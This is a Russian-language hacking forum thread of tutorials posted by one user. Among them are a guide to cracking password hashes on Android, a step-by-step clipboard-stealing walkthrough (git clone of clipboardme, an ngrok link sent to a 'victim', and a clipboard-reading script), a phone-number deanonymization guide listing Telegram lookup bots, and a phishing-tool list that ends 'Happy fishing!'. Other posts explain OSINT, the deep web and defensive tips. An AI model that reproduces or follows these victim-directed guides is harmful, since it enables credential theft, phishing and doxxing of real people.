Вы можете сделать это на их официальном сайте по ссылке. Если вас интересует код и технические детали, ознакомьтесь с информацией на Github.

Шаг 2: Импорт хэшей паролей.

После установки вам необходимо импортировать хэши на свой телефон, щелкнув параметр ИМПОРТ в меню.

Шаг 3: Выберите методы, правила и параметры.

Приложение Hash Suite Droid поддерживает брутфорс-атаку на следующие типы хеширования:

LM; NTLM; MD5; SHA1; SHA256; SHA512; DCC/2; WPA-PSK; BCRYPT.

Опции:

поддержка брутфорс атаки методом грубой силы, атаки по словарю, комбинированной атаки по правилам;
выбор количества задействования ядер CPU;
настройка диапазона температурного режима батареи в с° в установившемся рабочем режиме.

Давайте немного подробнее рассмотрим методы взлома паролей:

Атака по словарю. Что делает словарь, так это сравнивает пароль в списке слов с паролем, который вы хотите взломать. Это самый эффективный метод взлома паролей в настоящее время. Пока у вас есть всеобъемлющий список слов, вы можете взломать любой пароль. Вы также можете добавить и собственные словари.
Брутфорс атака. Многие люди в качестве пароля используют популярные слова или комбинации букв. Примером может служить «qwerty» или «12345». Существует и множество других готовых шаблонов, которые вы можете применить в своей атаке. Приложение также имеет множество других параметров настройки.
Атака по фразе. Если пароль содержит фразу, то его можно легко взломать этим методом.
Комбинированная атака. В такой атаке вы сами устанавливаете комбинации букв. Это грубая атака, но с правильным подходом вы можете сделать ее более эффективной. Например, вы вправе определить длину символа и тип выбираемых символов, а также многое другое.




Запуск атаки

После того, как вы выбрали метод и параметры атаки на пароль, вы можете приступить к взлому.

В зависимости от производительности устройства, время взлома пароля будет варьироваться. Однако, многие пароли взламываются мгновенно. Убедитесь, что ваше устройство достаточно заряжено. Этот процесс ресурсоемкий, а взлом пароля всегда занимает много времени. Наберитесь терпения, только тогда ваша атака будет успешной. После того, как вы успешно хакнули пароль, вы его сразу же увидите в списке паролей.




Вот так просто вы научились взламывать пароли прямо в телефоне.

Часто задаваемые вопросы (FAQ)
№1. Этот инструмент бесплатный?

Да, этот инструмент для пентеста можно использовать совершенно бесплатно.


№2. Я могу взломать любой пароль?

Да, вы можете взломать любой пароль, если у вас есть хороший словарь, и пароль соответствует хешу в предоставленном словаре.


№3. Приложение безопасно для устройства?

Конечно, это не повредит вашему устройству. Однако, мы все же рекомендуем ограничить использование батареи и процессора, чтобы ваше устройство не сильно нагревалось. Взлом паролей требует большой вычислительной мощности и может привести к быстрому нагреву вашего устройства.


№4 Приложение работает на IOS?

К сожалению, нет. Приложение поддерживается только на андроид.



Заключение

Hash Suite Droid - отличное хакерское приложение, как для новичков, так и для продвинутых пользователей. Вы можете сами устанавливать собственные критерии для взлома, контролировать процесс и наслаждаться результатом за считанные минуты. Приложение просто в использовании, а главное полностью бесплатно и с открытым исходным кодом.
 

BlackMAST

Арбитр проекта
Команда форума
Арбитр проекта
Проверенный продавец DeepWeb VIP
Регистрация
08.09.2022
Сообщения
99
Реакции
0
Как взломать содержимое буфера обмена





Вступить в наш чат​
«Копировать-вставить, копировать-вставить.» С большим количеством учетных записей и их паролей, люди привыкли сохранять данные в текстовом файле, чтобы в дальнейшем просто их скопировать и вставить в нужное поле. Да, такой подход существенно экономит время, но также делает данные пользователей более уязвимыми для взлома. Сейчас мы расскажем о способе, который позволяет удалено читать и контролировать чужие данные буфера обмена.




Как взломать данные буфера обмена с помощью Clipboardme?
Шаг 1: Откройте терминал Kali Linux и введите следующую команду, чтобы клонировать инструмент:

git clone https://github.com/cyberkallan/clipboardme

Шаг 2: Теперь переключитесь в каталог с помощью команды cd и запустите скрипт с помощью bash. Просто введите команды, указанные ниже:

cd clipboardme

bash clipboardme.sh

Шаг 3: Теперь выберите инструмент переадресации портов. Мы предпочитаем Ngrok, но при необходимости вы можете использовать serveo.net.



Шаг 4: После этого появится ссылка, как показано выше. Как только жертва откроет ее, содержимое буфера обмена будет скопировано.

Совместимость с браузером:
Если браузер обновлен до последней версии, то взлом сработает, но жертва увидит следующий запрос на разрешение:





Шаг 5: Если вы хотите проверить скопированный контент, просто откройте текстовый файл clipboard_backup. Вы также можете использовать те же команды:

cd clipboardme

cat clipboard_backup.txt


Как работает взлом Clipboardme?
Clipboardme — это инструмент пентестера, который может получить доступ для чтения и записи к содержимому в буфере обмена, просто открыв ссылку. Последние версии браузеров не позволяют сделать взлом скрытным, отображая запрос, как было показано выше, однако старые версии могут напрямую копировать содержимое буфера обмена жертвы, используя API.

API изначально предназначался для того, чтобы напрямую интегрировать копирование и вставку между приложениями и сайтами. Проблема в том, что существует очень мало способов защитить скопированный текст. Таким образом, этот хак может легко взломать данные буфера обмена. Для этого введите:

<script>

navigator.clipboard.readText().then(clipText => document.write(clipText));

</script>

Теперь вы можете успешно выполнить взлом буфера обмена и прочитать данные без ведома жертвы.

Поскольку вы видели, как работает взлом, то вам наверняка стало интересно, как защитить свои данные.

Ниже приведены советы, которые вам помогут обезопасить себя от подобного взлома.

1) Обновите свой браузер:

Вы должны обновлять свой браузер каждый раз, когда доступна новая версия. Мы также рекомендуем загрузить и использовать несколько браузеров, чтобы обеспечить максимально безопасную работу в Интернете. Чтобы проверить версию вашего браузера, щелкните значок шестеренки в меню настроек (три точки, расположенные вертикально друг над другом) в правом верхнем углу, затем щелкните параметр справки и пункт «О Google Chrome». Откроется новая вкладка, и вы увидите последнюю версию Google Chrome, установленную в вашей системе.

2) Удаляйте данные из буфера обмена после использования:

Есть много способов очистить данные буфера обмена вручную в операционной системе Windows. Самый простой способ — нажать «Windows + V», вы увидите данные буфера обмена в правом углу. Нажмите «Очистить все» или «Удалить определенные записи».

На этом все. Соблюдайте меры безопасности и используйте инструмент с умом. Удачного взлома!
 

BlackMAST

Арбитр проекта
Команда форума
Арбитр проекта
Проверенный продавец DeepWeb VIP
Регистрация
08.09.2022
Сообщения
99
Реакции
0
Seekr - новый мультизадачный инструмент для OSINT




Вступить в наш чат
Хотите собрать информацию о человеке, но поиск и анализ данных отнимают слишком много времени и сил? Сегодня мы расскажем, как упростить этот процесс с помощью нового инструмента - Seekr. Независимо от того, являетесь ли вы специалистом по OSINT, кибер-разведчиком или новичком, желающим попробовать себя в этом деле, Seekr упрощает поиск необходимых данных и управление ими.





Преимущества Seekr
Seekr сочетает в себе ведение заметок и OSINT в одном приложении. Он разработан и оптимизирован с учетом всех потребностей для OSINT. Seekr можно использовать вместе с другими приложениями, так как он станет отличным дополнением вашего разведческого инструментария.

Ключевая особенность:
База данных для OSINT;
GitHub для отправки по электронной почте;
Учетные карточки для каждого человека в базе данных;
Обнаружение аккаунта, интеграция с карточками аккаунта.




Установка
Windows

Загрузите последний exe здесь

Linux (стабильная версия)

Загрузите файл отсюда

Linux (нестабильная)

Чтобы установить Seekr в Linux, просто запустите:

git clone https://github.com/seekr-osint/seekr
cd seekr
go run main.go

Теперь откройте веб-интерфейс в выбранном вами браузере.

Запуск на NixOS

Seekr создан с учетом NixOS и поэтому поддерживает nix flakes. Чтобы запустить Seekr в NixOS, выполните следующие команды:

nix shell github:seekr-osint/seekr
seekr


Начало работы
journey
title How to Intigrate seekr into your current workflow.
section Initial Research
Create a person in seekr: 100: seekr
Simple web research: 100: Known tools
Account scan: 100: seekr
section Deeper account investigation
Investigate the accounts: 100: seekr, Known tools
Keep notes: 100: seekr
section Deeper Web research
Deep web research: 100: Known tools
Keep notes: 100: seekr
section Finishing the report
Export the person with seekr: 100: seekr
Done.: 100


Заключение
Seekr — это удобный набор инструментов с простым интерфейсом, который может упростить ваш рабочий процесс и сделать его более эффективным. Он позволяет легко находить, систематизировать и управлять нужными данными. В целом, если вы ищете мультизадачный инструмент OSINT, который сочетает в себе ведение заметок и управление данными в одном месте, то Seekr определенно заслуживает вашего внимания.
 

BlackMAST

Арбитр проекта
Команда форума
Арбитр проекта
Проверенный продавец DeepWeb VIP
Регистрация
08.09.2022
Сообщения
99
Реакции
0




Вступить в наш чат
Что вы знаете о «глубокой сети»? Что там обитают хакеры, а обычным пользователям лучше держаться подальше от этого места? Тогда вы можете быть удивлены, узнав, что пользуетесь глубокой сетью каждый день. На самом деле, термин «глубокая сеть» часто путают с двумя другими словами «dark web» и «darknet».
Если вы ни раз слышали эти понятия, но до сих пор не можете отличить одно от другого, то настало время наконец-то разобраться в этом. Поехали!




Весь интернет можно условно поделить на 2 части, подобно большому айсбергу.
Верхушка айсберга

Surface Web


Surface Web (Поверхностная или видимая сеть) — это сеть, которую мы используем изо дня в день. Мы все погружены в поверхностную паутину. Именно здесь происходит наша повседневная онлайн-деятельность и то, что большинство людей считают Интернетом. Это общедоступные бесплатные сайты, не требующие регистрации и установки каких-то специальных программ, которые можно посетить с помощью любого браузера.
Подводная часть

Подводная часть делится еще на 2 уровня:
Deep Web

Верхний уровень называется «глубокий Интернет» (Deep Web). К нему относятся веб-сайты, требующие верификации личности, ресурсы, которые невозможно найти, используя поисковики типа Google, или закрытые страницы. Вы отметили в профиле ВКонтакте, что хотите скрыть его от поисковиков? Сайт требует ввести капчу? Статья доступна только по подписке? Если что-то открыть все же можно, а найти — нельзя, то это тоже deep web.
Darknet

Нижний уровень — это темный анонимный Интернет (DarkNet). Обычному пользователю войти туда не помогут ни прямая ссылка, ни пароль. Узлы каждого отдельно взятого даркнета — серверы, компьютеры, роутеры — не видны не только поисковикам, но и большинству браузеров, поскольку для передачи данных внутри такой сети используются нестандартные протоколы. Доступ возможен только через специализированное программное обеспечение, например, Tor Browser, I2P, Freenet и т. д.
Вместе даркнеты составляют dark web (темный веб) — ту часть deep web, которая свободна от цензуры, никем не контролируется и не регулируется, поэтому привлекательна для многих темных личностей.
Разница между Deep Web и Dark Web

Вот основные различия между темной и глубокой сетью:








Безопасность

Теперь вы знаете, что данные, хранящиеся в «глубокой сети» являются безвредными, просто там они находятся в безопасности, «в глубине», незаметно для тех, кому они не предназначены. Вот если некоторые из них, например частная переписка, «всплывут на поверхность» и попадут в поисковый индекс, тогда начнутся проблемы. Поэтому лучше как следует защищать свой спрятанные кусочек айсберга — аккаунты и документы, к которым у вас есть доступ:

  • Используйте уникальные и надежные пароли;
  • Перед тем как вводить учетные данные, всегда проверяйте, где именно вы собираетесь это сделать. Например, если адрес страницы написан с ошибкой, то это верный признак того, что сайт является фишинговым;
  • С осторожностью загружайте файлы и программы, так как некоторые из них содержат вредоносное ПО;
  • Не предоставляйте доступ к конфиденциальным данным третьим лицам;
  • Не бродите по темной сети, если не уверены в своей безопасности. Неизвестно на кого там можно нарваться.
 

BlackMAST

Арбитр проекта
Команда форума
Арбитр проекта
Проверенный продавец DeepWeb VIP
Регистрация
08.09.2022
Сообщения
99
Реакции
0



Вступить в наш чат
В наши дни онлайн-угрозы становятся все более изощренными и непредсказуемыми. Для расследования киберпреступлений и борьбы с ними требуется ряд методов и инструментов, одним из которых является OSINT IP-адреса. Этот мощный метод включает в себя использование аналитики из открытых источников для сбора информации об IP-адресах, включая выявление угроз, отслеживание киберпреступников и раскрытие вредоносной активности.
В этой статье мы расскажем, как работает OSINT IP-адреса, а также поделимся советами и рекомендациями по проведению эффективных и безопасных расследований.





Что такое IP-адрес

IP-адрес — это уникальный числовой идентификатор, который присваивается устройству, подключенному к Интернету. Он состоит из двух компонентов: идентификатора сети и идентификатора хоста. Адреса IPv4 являются наиболее распространенным типом и состоят из четырех наборов чисел, разделенных точками, в то время как адреса IPv6 используют более длинный и сложный формат.





Адреса IPv4 — это наиболее распространенный тип IP-адресов, состоящий из четырех чисел, разделенных точками, например 192.168.0.1. Адреса IPv6 наоборот состоят из более длинной последовательности цифр и букв, разделенных двоеточиями. Например: 2001:0db8:85a3:0000:0000:8a2e:0370:7334.
Также важно понимать, что IP-адреса могут быть динамическими или статическими. Динамические IP-адреса периодически меняются, в то время как статические IP-адреса остаются неизменными, если их не поменять вручную.
Инструменты для OSINT IP-адреса

Существует несколько инструментов для проведения OSINT-расследований. Для каждого OSINT расследователя важно выбрать правильные инструменты под свои конкретные нужды.
Whois — это протокол, используемый для поиска информации о доменных именах, IP-адресах и других сетевых ресурсах. Используя инструмент поиска Whois, вы можете собирать информацию об IP-адресах, включая организацию, которой принадлежит блок IP-адресов, и контактную информацию администратора сети.





Инструмент GeoIP позволяет определить геолокацию IP-адреса и его физическое местоположение. Это может быть полезно для отслеживания киберпреступников, которые могут действовать из определенного местоположения.





Инструмент обратного поиска Reverse Lookup можно использовать для определения доменного имени, связанного с IP-адресом. Он помогает выявлять вредоносные домены, связанные с определенным IP-адресом.



hodan — это поисковая система, которая специализируется на сканировании устройств, подключенных к Интернету, включая серверы, маршрутизаторы и устройства IoT. Выполняя поиск IP-адресов или другой сетевой информации в Shodan, можно обнаружить уязвимые устройства, которые могут быть подвержены взлому.



Maltego — популярный инструмент для анализа данных, используемый в расследованиях OSINT. С помощью него вы можете визуализировать и анализировать сложные наборы данных, включая информацию об IP-адресах, в удобном для вас интерфейсе.





Сбор информации с IP-адреса

OSINT IP-адреса может предоставить ценную информацию для расследования киберпреступлений. Собирая информацию об IP-адресах, вы можете выявить потенциальных участников киберугроз и выследить киберпреступников, а также обнаружить вредоносную активность, например, источник фишинговой атаки.
В дополнение к вышеупомянутым преимуществам сбора информации с IP-адресов, есть и другие способы, которыми OSINT IP-адреса может быть полезен для специалистов по кибербезопасности:

  1. Выявление скомпрометированных систем. Исследователи могут обнаруживать системы, в которых наблюдается подозрительная активность, путем анализа сетевого трафика, связанного с IP-адресом. Этот анализ может помочь в предотвращении кибератаки.
  2. Проведение разведки угроз. С помощью OSINT IP-адреса специалисты по кибербезопасности собирают информацию о потенциальных киберугрозах. Они могут идентифицировать IP-адреса, связанные с известными вредоносными программами или группами киберпреступников, а также отслеживать распространение кибератак по разным сетям.
  3. Отслеживание источника кибератак. Благодаря инструментам для OSINT IP-адреса можно отслеживать источник кибератак и идентифицировать лиц или организации, ответственные за них. Эта информация может быть использована для создания дела против киберпреступников и помощи правоохранительным органам в их расследованиях.
Таким образом, сбор информации с IP-адресов является важной частью расследования киберугроз и защиты от кибератак.
Использование IP-адреса для цифровой криминалистики

Цифровая криминалистика — это практика сбора, анализа и сохранения электронных данных для расследования киберпреступления. OSINT IP-адреса может быть ценным инструментом, поскольку он позволяет отслеживать источник кибератак и находить доказательства.
Вот несколько способов использования OSINT IP-адреса в цифровой криминалистике:

  • Выявление вредоносного ПО. Анализируя сетевой трафик, связанный с IP-адресом, возможно не только выявить вредоносным ПО, но и отследить его источник. Это может помочь в определении масштабов кибератаки и ее предотвращении.
  • Отслеживание киберпреступников. Используя OSINT IP-адреса, специалисты по кибербезопасности могут определить источник кибератаки и, возможно, отследить ответственных лиц. Эта информация может оказаться бесценной в судебных разбирательствах и возбуждении дела против киберпреступников.
  • Расследование утечек данных. Эксперты могут использовать OSINT IP-адреса для расследования утечек данных и определения того, как произошла утечка. Анализируя сетевой трафик, связанный с IP-адресом, они могут выявить потенциальные уязвимости в системе и принять меры для предотвращения будущих нарушений.
Советы для проведения OSINT IP-адреса

При проведении OSINT-расследований IP-адресов важно следовать некоторым рекомендациям:

  1. Используйте безопасные инструменты. Убедитесь, что инструменты, которые вы используете для OSINT IP-адреса, заслуживают доверия. Ищите инструменты, проверенные экспертами по кибербезопасности и имеющие надежную репутацию.
  2. Защитите личную информацию. При проведении OSINT-расследований IP-адресов будьте осторожны, чтобы не раскрыть свою личность. Используйте VPN или другое безопасное соединение, чтобы защитить свою информацию. Не используйте личные учетные записи — например, электронную почту или профили в социальных сетях для расследования.
  3. Проверьте свои источники. Дважды проверьте информацию, которую вы собираете с IP-адресов, чтобы убедиться, что она точна и надежна. Используйте несколько источников для подтверждения своих выводов и не полагайтесь только на один источник информации.
Заключение

OSINT IP-адреса — это мощный инструмент для расследования киберпреступлений и борьбы с ними. Собирая информацию об IP-адресах, эксперты могут выявлять потенциальных участников угроз, отслеживать киберпреступнико
 

BlackMAST

Арбитр проекта
Команда форума
Арбитр проекта
Проверенный продавец DeepWeb VIP
Регистрация
08.09.2022
Сообщения
99
Реакции
0
Что твой номер телефона расскажет о тебе?— OSINT





Вступить в наш чат​

Современные реалии таковы, что телефонные номера стали неотъемлемой частью повседневной жизни. Пользователи указывают свои номера в социальных сетях, на сайтах объявлений и в различных интернет-магазинах, но они не подозревают, что делают себя легкой добычей для хакеров и мошенников. OSINT по номеру телефона становится все более популярным методом сбора ценной информации о человеке. Вы не ослышались, всего лишь 11 цифр телефона могут быть использованы для деанона пользователя. В этой статье мы рассмотрим различные методы и инструменты, используемые для OSINT по номеру телефона.






Что может рассказать номер телефона

Одним из первых шагов в проведении OSINT по номеру телефона является сбор информации о самом телефоне. Это может включать определение оператора связи, местоположения и модель телефона. Для сбора этой информации можно использовать онлайн-сервисы. С их помощью вы можете получить важную информацию о привычках человека, например, о том, где он живет и работает.

Номера телефонов также можно использовать для поиска профилей в социальных сетях. Так, в Facebook, Instagram и ВК можно быстро найти учетную запись человека, включив поиск по контактам (предварительно нужно занести номер в свой телефон). Как только учетная запись будет идентифицирована, вы сможете собрать дополнительную информацию об онлайн-активности и интересах человека.

Номера телефонов также можно использовать для поиска в общедоступных базах данных. Например, использовать номер телефона для поиска судебных записей, ИП и других документов. Все это может дать ценную информацию о судимости человека, финансовом положении и других аспектах его личной и профессиональной жизни.
Инструменты OSINT

Существует множество способов пробива по номеру телефона. Вот некоторые инструменты, которые можно использовать для OSINT по номеру телефона:

1. Truecaller




2. Microsoft поз*воля*ет про*верять при*вяз*ку номера к акка*унту на сай*те account.live.com.





3. @bmi_np_bot — по номеру телефона определяет регион и оператора, включая новые номера.





4. @getfb_bot — выдает привязанную к номеру телефона страницу в Facebook.





5. @get_kontakt_bot — найдет как записан номер в контактах, имеет большую базу контактов.





6. nuga.app — поиск страницы Instagram по номеру. При первом сканировании найденная страница предоставляется сразу, но при последующих поисках нужно будет подписаться на соцсети создателей.





7. pipl.com — полезный ресурс для поиска человека по номеру телефона в самых популярных соц. сетях. Несмотря на то что сайт платный, есть пробный период.






Заключение

OSINT телефонного номера — это действенный способ деанона человека. Используя комбинацию инструментов и методов, разведчики могут раскрыть огромное количество информации о личной и профессиональной жизни пользователя. Будьте предельно внимательны и не указывайте информацию в социальных сетях, которая поможет вас идентифицировать. Не облегчайте сбор информации мошенниками и различным сборщикам телефонных баз.
 

BlackMAST

Арбитр проекта
Команда форума
Арбитр проекта
Проверенный продавец DeepWeb VIP
Регистрация
08.09.2022
Сообщения
99
Реакции
0
OSINT домена. Собираем информацию о сайте




Вступить в наш чат​

В эпоху роста цифровых технологий нельзя недооценивать киберпреступность, которая уже стала серьезной угрозой как для отдельных лиц, так для предприятий и даже правительства. Как правило, любая хакерская атака начинается с поиска информации о цели, а некоторые атаки на этом этапе и заканчиваются. В этом цифровом хаосе важно обезопасить себя, и в случае чего первым нанести удар. Однако, для этого необходимо обладать знаниями и инструментами для поиска из открытых источников.

Сегодня мы рассмотрим такое понятие, как OSINT доменного имени, а также различные инструменты и методы, которые могут использоваться для сбора информации о сайте.






Что такое домен

Прежде чем углубиться в OSINT домена, важно иметь общее представление о том, что значит доменное имя.
Доменное имя — это адрес, который пользователи вводят в адресной строке браузера для доступа к сайту или, проще говоря, это адрес сайта в Интернете. Например, доменное имя Google — «google.com».






Доменные имена состоят из двух частей: домен верхнего уровня (TLD) и домен второго уровня (SLD). TLD — это часть доменного имени, которая стоит после последней точки, например «.ru», «.com» или «.net». SLD — это часть доменного имени, которая стоит перед TLD, например, «google» в приведенном выше примере.

В дополнение к TLD и SLD доменные имена также могут содержать поддомены, которые представляют собой дополнительные разделы, предшествующие SLD. Например, «mail.google.com» является субдоменом «google.com». Субдомены часто используются для сортировки разделов сайта или для создания иерархии контента.

OSINT домена

OSINT домена — это процесс сбора и анализа информации из открытых источников о конкретном домене (сайте). Домен OSINT может использоваться для сбора ценной информации о возможных атаках, уязвимостях и угрозах, нацеленных на какую-то организацию.

Инструменты для домена OSINT

Теперь, когда мы ознакомились с основами доменных имен, давайте рассмотрим различные инструменты для проведения OSINT-разведок.

WHOIS.net и DomainTools
Инструменты, позволяющий искать информацию о доменном имени, включая регистрационные данные и контактную информацию владельца домена.






DomainTools, SecurityTrails и DomainTools Iris

Инструменты истории домена, которые позволяют отслеживать изменения прав собственности и истории домена, включая изменения в записях DNS, IP-адресах и SSL-сертификатах.






SSLShopper и SSL Labs

Инструменты поиска SSL-сертификатов. С помощью этих инструментов можно искать сертификаты SSL, связанные с определенным доменным именем. SSL-сертификаты могут предоставить ценную информацию о владельце веб-сайта и помочь выявить вредоносную активность.







ViewDNS, Nslookup и DNSstuff

Инструменты поиска DNS могут запрашивать систему доменных имен (DNS) для получения информации об IP-адресе доменного имени, почтовых серверах и другой информации.





Каждый из этих инструментов имеет свои сильные и слабые стороны, и для успешной разведки вам потребуется использовать комбинацию этих инструментов для сбора всех необходимых данных.

Советы по проведению OSINT домена

Теперь, когда мы знаем об инструментах для OSINT-расследований, давайте посмотрим, как выжить максимум из разведки и предостеречь себя от опасности. Ниже приведены рекомендации, о которых следует помнить:

Используйте надежные инструменты: при проведении OSINT-расследований домена важно использовать безопасные инструменты, которые защищают ваши данные и личную информацию.
Защитите свои данные: будьте осторожны, когда проводите OSINT разведку, чтобы не раскрыть свою личную информацию. Используйте псевдонимы и избегайте использования личного адреса электронной почты или номера телефона.
Используйте несколько источников: не полагайтесь исключительно на один инструмент или базу данных. Важно использовать несколько источников информации.
Оставайтесь в курсе новостей: киберпреступники постоянно совершенствуют свои тактики, поэтому важно быть в курсе последних событий, новейших тенденций и технологий.


Заключение

В заключение хотелось бы отметить, что OSINT домена является одним из самых важных способов получения данных о конкретном сайте. Собирая информацию о доменных именах, вы можете выявлять источник угроз, отслеживать киберпреступников и собирать данные о конкурентах. Для проведения эффективных и безопасных OSINT-расследований важно следовать передовым методам и использовать безопасные инструменты, о которых мы вам и рассказываем. На этом все. Удачи!
 

BlackMAST

Арбитр проекта
Команда форума
Арбитр проекта
Проверенный продавец DeepWeb VIP
Регистрация
08.09.2022
Сообщения
99
Реакции
0
Топ-10 фишинговых инструментов всех времен





Вступить в наш чат​

Возможно, вы уже ни раз сталкивались с фишингом и знаете, что существует множество способов для создания поддельных сайтов. Но так ли они все хороши? Сегодня мы подготовили для вас 10 лучших бесплатных инструментов с открытым исходным кодом, которые вам обязательно понравятся.





Прежде чем перейти к практической части, давайте освежим ваши знания о фишинге и о том, как он работает. Ну а если вы уже профи в этом деле, то переходите сразу к инструментам.

Фишинг. Почему такое название

Фишинг — это метод взлома, при котором злоумышленник создаёт поддельный сайт в точности как настоящий, при этом жертва, попадая на такой сайт, сливает свои личные данные. Фишинг — один из старейших, но наиболее эффективных методов взлома. Если раньше хакеру требовалось вручную создавать фишинговую страницу, то теперь за вас это делает специальная программа, что делает процесс взлома ещё более доступным даже для новичка.

Слово "фишинг" в переводе на английский означает "рыбачить". Такое название появилось не с проста, так как вы подобной рыбаку делаете приманку, а затем бросаете ее в воду, в ожидании того, что рыба клюнет.

Готовы поймать рыбку?​

Данная статья предоставлена исключительно в образовательных целях. Мы не несём ответственности за любые ваши действия.


Делаем приманку
С помощью инструментом возможно сделать фишинг максимально доступным. В основном инструменты фишинга применяются по трем причинам:

1) Простота в использовании;

2) Вы можете поймать много «рыбы»;

3) Любой пользователь может использовать фишинг без предварительных знаний в области программирования или скриптов.

Топ лучших инструментов
1. Ghost Phisher

Ghost Phisher — это программа для аудита безопасности и взлома Wi-Fi, написанная с использованием языка программирования Python и библиотеки графического интерфейса Python Qt. Ghost Phisher на данный момент поддерживает и интернет-хостинг веб-страницы и регистратор учетных данных (фишинг).
2. SPF (SpeedPhish Framework)

Еще одна программа на Python или просто инструмент для фишинга, созданный Адамом Комптоном. SPF состоит из множества опций, которые позволяют быстро настроить и провести эффективные фишинговые атаки. Помимо этого, инструмент имеет множеством других приятных опций (например, сбор адресов электронной почты).
3. Phishing Frenzy

Это инструмент для фишинга электронной почты. Хотя Phishing Frenzy разработан для тестирования на проникновение, он имеет множество опций, которые сделают фишинг максимально простым. Однако, Phishing Frenzy разработан на базе ОС Linux, с настройкой которой у новичка могут возникнуть трудности.
4. Gophish

Будучи фишинговой платформой с открытым исходным кодом, Gophish — это отличный вариант для начинающих фишеров. Инструмент может похвастаться простой настройкой: скачайте и извлеките ZIP-папку. Также он имеет легкий и интуитивно понятный интерфейс, а опции, хотя и ограничены, детально продуманы.
5. sptoolkit Rebirth

Хотя инструмент не имеет привлекательного интерфейса, у него есть другая существенная характеристика, которая ставит его наравне с другими в нашем рейтинге. Инструмент сочетает фишинг с безопасностью. А также имеет ряд обучающих видео, которые будут полезны новичку.
6. LUCY

Инструмент для пентестинга и фишинга. LUCY представляет собой удобную платформу, имеющую красивый интерфейс (хотя и немного сложный). Однако, некоторые необходимые параметры недоступны в бесплатной версии.
7. King Phisher

С King Phisher от SecureState мы попадаем в класс более совершенных инструментов фишинга. King Phisher Toolkit недоступен ни на одном веб-сайте, а только в Linux, поэтому убедитесь, что вы загружаете его только из Github. Возможности King Phisher многочисленны, включая одновременный запуск нескольких атак, просмотр геолокации жертв и многое другое. Пользовательский интерфейс понятен и удобен.
8. SpearPhisher Beta

SpearPhisher разработан для новичков и представляет собой программу для Windows с простым графическим интерфейсом. Это означает, что вы можете быстро создать фишинговое электронное письмо с нужными полями, а также можете отправить созданный имейл нескольким жертвам одновременно.
9. Wireshark: Phishing Tools

Wireshark — передовой в мире инструмент для фишинга. Wireshark поставляется с графическими инструментами для визуализации статистики, что упрощает анализ результатов.
10. Metasploit: Phishing Tools

Новый Metasploit от поставщика систем безопасности Rapid7 делает шаг вперед по сравнению с предыдущими версиями, предоставляя новый механизм фишинга и современные модули эксплойтов.

Заключение

Существует множество инструментов для фишинга, каждый из которых имеет свои уникальные функции. Однако, все они прекрасно справляются с поставленной задачей, а значит выбор инструмента зависит от ваших целей и знаний в области фишинга. На этом все. Удачной «рыбалки»!
 

BlackMAST

Арбитр проекта
Команда форума
Арбитр проекта
Проверенный продавец DeepWeb VIP
Регистрация
08.09.2022
Сообщения
99
Реакции
0



Вступить в наш чат
Количество киберугроз, как и ущерб от хакерских атак, растет с каждым годом. По экспертным оценкам, потери от киберпреступлений достигнут $10,5 трлн в 2025 году. Поэтому на сегодняшний день важно противостоять кибератакам как на уровне государства, так и на уровне каждого пользователя за счет соблюдения необходимых шагов на пути к вашей кибербезопасности. В этой статье мы продолжаем расследовать кибератаки с помощью OSINT.
Прежде чем мы начнем, убедитесь, что вы прочитали нашу первую часть, где мы подробно рассказали про расследования таких киберпреступлений, как атаки программ-вымогателей, кражу личных данных, вредоносные ПО и социальную инженерию.


Взлом и утечка данных





Взлом и утечка данных — это киберпреступления, связанные с несанкционированным доступом к компьютеру и кражей конфиденциальной информации. С помощью OSINT можно выявлять источники взломов и утечек данных, выслеживать лиц, стоящих за ними.
Ниже приведены подходящие инструменты для расследования взломов и утечек данных:

  1. Have I Been Pwned: бесплатный онлайн-сервис, который позволяет вам проверить, была ли ваша электронная почта причастна к утечкам данным.
  2. Shodan: поисковая система для подключенных к Интернету устройств, которую можно использовать для выявления уязвимостей.
  3. Censys: поисковая система с тем же принципом работы, что и Shodan.
  4. Hunter.io: инструмент для поиска адресов электронной почты, связанных с определенным доменным именем, который может быть полезен для выявления возможных хакерских атак.
  5. TheHarvester: инструмент для сбора адресов электронной почты, субдоменов и другой информации, которая может быть полезна для выявления потенциальных уязвимостей.
Фишинг





Фишинг — это распространенный вид мошенничества, при котором злоумышленники создают поддельный сайт в точности как настоящий, при этом жертва, попадая на такой сайт, сливает свои личные данные. С помощью OSINT вы можете анализировать заголовки электронной почты, доменного имени и содержимого сообщения. Кроме того, вы можете использовать специальные инструменты для выявления фишинговых доменов и анализа их активности.
В этом вам помогут следующие инструменты:

  1. PhishTank: обширная база данных известных фишинговых URL-адресов.
  2. Maltego: инструмент интеллектуального анализа с целью нахождения взаимосвязей между данными.
  3. VirusTotal: инструмент для проверки файлов или URL-адресов на наличие вредоносных программ.
  4. Google Safe Browsing: сервис для проверки URL-адресов на предмет потенциальных фишинговых атак.
  5. WHOIS Lookup: инструмент для идентификации владельца доменного имени.
Интернет-мошенничество





Интернет-мошенничество может принимать различные формы, включая поддельные интернет-магазины, махинации с инвестициями и т.д. Прежде всего, при расследовании онлайн-мошенничества разведчики могут использовать OSINT для анализа веб-сайтов, профилей в социальных сетях. Точно так же они могут выявлять поддельные веб-сайты и профили и анализировать финансовые транзакции на предмет подозрительной активности, используя такие инструменты, как:

  1. FraudRecord: платформа для отслеживания мошенников.
  2. Scamadviser: инструмент для проверки репутации сайтов и интернет-продавцов.
  3. Trustpilot: платформа для проверки рейтинга компаний.
Интернет-буллинг





Онлайн-буллинг может принимать различные формы, включая сообщения с угрозами, нежелательные контакты и доксинг. Анализируя онлайн-активность злоумышленника, профили в социальных сетях и каналы связи с помощью OSINT можно отследить преследователя и остановить буллинг. Для поиска личной информации злоумышленника и анализа его онлайн-активности пригодятся инструменты:

  1. Поиск Google: найдите онлайн-профили, сообщения или изображения, связанные с преследователем.
  2. Social Catfish: поиск учетных записей людей в социальных сетях по электронной почте, номеру телефона или имени пользователя.
  3. Tineye: инструмент обратного поиска изображений, чтобы найти, где еще в Интернете было размещено изображение.
  4. StalkScan: инструмент для сбора информации о страницах на Facebook.
  5. Maltego: инструмент интеллектуального анализа для визуализации взаимосвязей между данными, который может помочь определить связи между преследователем и жертвой.
Атаки типа «отказ в обслуживании» (DDoS)





DDoS-атака — это разновидность кибератаки, при которой злоумышленники используют сеть скомпрометированных устройств, чтобы перегрузить целевой сервер или сеть. Для расследования DDoS-атак используйте следующие инструменты:

  1. Shodan: поисковая система для устройств, подключенных к Интернету, может определять потенциальные цели DDoS-атак.
  2. DDoS Map: карта DDoS-атак в реальном времени, происходящих по всему миру.
